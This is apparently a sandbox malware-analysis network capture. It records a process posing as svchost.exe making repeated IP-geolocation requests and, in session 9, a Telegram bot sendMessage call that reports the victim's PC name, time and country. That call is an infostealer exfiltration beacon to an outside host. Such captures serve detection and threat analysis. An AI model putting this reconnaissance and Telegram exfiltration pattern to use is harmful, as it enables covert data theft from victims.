                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc1931fab108c33-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1962&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1444829&cwnd=245&unsent_bytes=0&cid=594978a04e5fd056&ts=136&x=0"
                                                                                                              2025-01-03 08:21:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.749778188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:21 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207270
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz7uqHHkFUZPQEJVvam7RW45OAHgP63JR3WGW3UcU3AVIcPfouoj%2Bh842LT7P0p%2FivEJDAkuJzMSZCmIybH9oslhK7c84iMt8o1gkneUki12OaOdDbbcWWwKZUJkVex4mKsVhEAv"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19327b93c434b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1573&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1814791&cwnd=243&unsent_bytes=0&cid=514376c756abeb71&ts=140&x=0"
                                                                                                              2025-01-03 08:21:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.749788188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:22 UTC859INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:22 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207271
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynzLrCLPsv5eTh7NKBv%2BpgrhYUQKtrToyR%2FY%2FyuVpnxm5SJErXdgRCe0AyMMOh6l2MY2hNbnXZbgZfauQHbH0Ha9GLNFVnz1npwakeD%2F%2BLPcluc3iktp9LkyZi443TT8ZMvDMLpz"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc1932fd87e7d06-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1930&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1512953&cwnd=244&unsent_bytes=0&cid=e80fe3fa3828b436&ts=148&x=0"
                                                                                                              2025-01-03 08:21:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.749797188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:23 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:24 UTC859INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:23 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207273
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HILiX3beoie1nURzjhAQL54pfnb9QceVMIuAGXt%2F0GS%2FwcaB9Nx7jqGtE34dzg92jx%2BNuSDIFmesKPZ7xs6LjgZpHrH%2BMzR6BVKc7Q%2FjgBSPqMCFBrABWSKZvyknIgtKaoiOUG0G"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19338abc34257-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2178&min_rtt=2174&rtt_var=824&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1321865&cwnd=215&unsent_bytes=0&cid=1eb07aa352c23fed&ts=164&x=0"
                                                                                                              2025-01-03 08:21:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.749806149.154.167.2204437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:24 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:24 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 03 Jan 2025 08:21:24 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-03 08:21:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.749812188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:25 UTC851INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207274
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfqW2ArFb7Z4wXz%2BAZKG8DTzLui46kHfQBAPs9M7mxISOpyiFlrJHVtrVTteYdSzrBBnYZtHYaORkc5otNRLCWiQ80LIWyvrPCJzMFSngUOCZ1CGptaA2Rgtbb3korJqflsYgXvV"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19342094943dd-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1574&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=196&unsent_bytes=0&cid=882f0621dbd53786&ts=191&x=0"
                                                                                                              2025-01-03 08:21:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.749823188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:26 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:26 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:26 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207275
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQSHzlKaCMoQuP4QNJPumGC0AXT4XAc0%2FBoCPY5O1nbG0lMVHFI2dkn%2Fh%2F8sz1sYfiO5EOSoHZt6R7Tz6lIfYoHliVR2kIoiVTsZTHxG0CEnECPqhpFoxGWVnsRD3kT9fBAJbDus"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc1934799c1728a-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1976&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457085&cwnd=227&unsent_bytes=0&cid=6d50fe6861654bfe&ts=149&x=0"
                                                                                                              2025-01-03 08:21:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.749833188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:27 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207276
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BeCY2VQ8EkNxVXlwYai1tcx%2FVMC9R%2BHRMdFphK8c54yx0B3K8S0u15uG6RWLpSbSFrm4a1gTWmxMDg8KsUT6IvjMBupaEXK3QT7SHS672RbYsKkATdcmXkj%2FXXA5jNZo7nuNNXB4"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc193501cf3c334-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1454&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1932495&cwnd=247&unsent_bytes=0&cid=104b9e8a246b63d2&ts=153&x=0"
                                                                                                              2025-01-03 08:21:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.749844188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:29 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:29 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207278
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1j5evo8weGRkI%2Bj%2FMbsxTmFiRxbbRoSmWNrjsWA%2FiUjLWL3zLEiWQAZ9iEXFVfumLezilk2Qs76pO%2FV509jW%2BfY50UX3xPWbC469DKQWwUpqN%2FCd9G6jEm5snjTQu1uEBz2XFws2"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc193586e1a42b3-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2458&min_rtt=2455&rtt_var=927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1176470&cwnd=237&unsent_bytes=0&cid=6c2f4136ac3f57b4&ts=150&x=0"
                                                                                                              2025-01-03 08:21:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.749853188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:30 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:30 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207279
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lbsEq47YNlzlk6LkmBaBOMKiUsKZHbBZac6eCaAivCysHH4QvOW59iyy7jgG9Q6tjWlkXm6oTXi1WRuUqYtkaoMrw%2BUS7%2Bv%2FGHUFsni%2FvB8Pse%2F2zRuOXLZiPez5HFKgHUWkBOw%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19360a9cd4211-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1681059&cwnd=239&unsent_bytes=0&cid=5ba88531a1924fda&ts=153&x=0"
                                                                                                              2025-01-03 08:21:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.749862188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
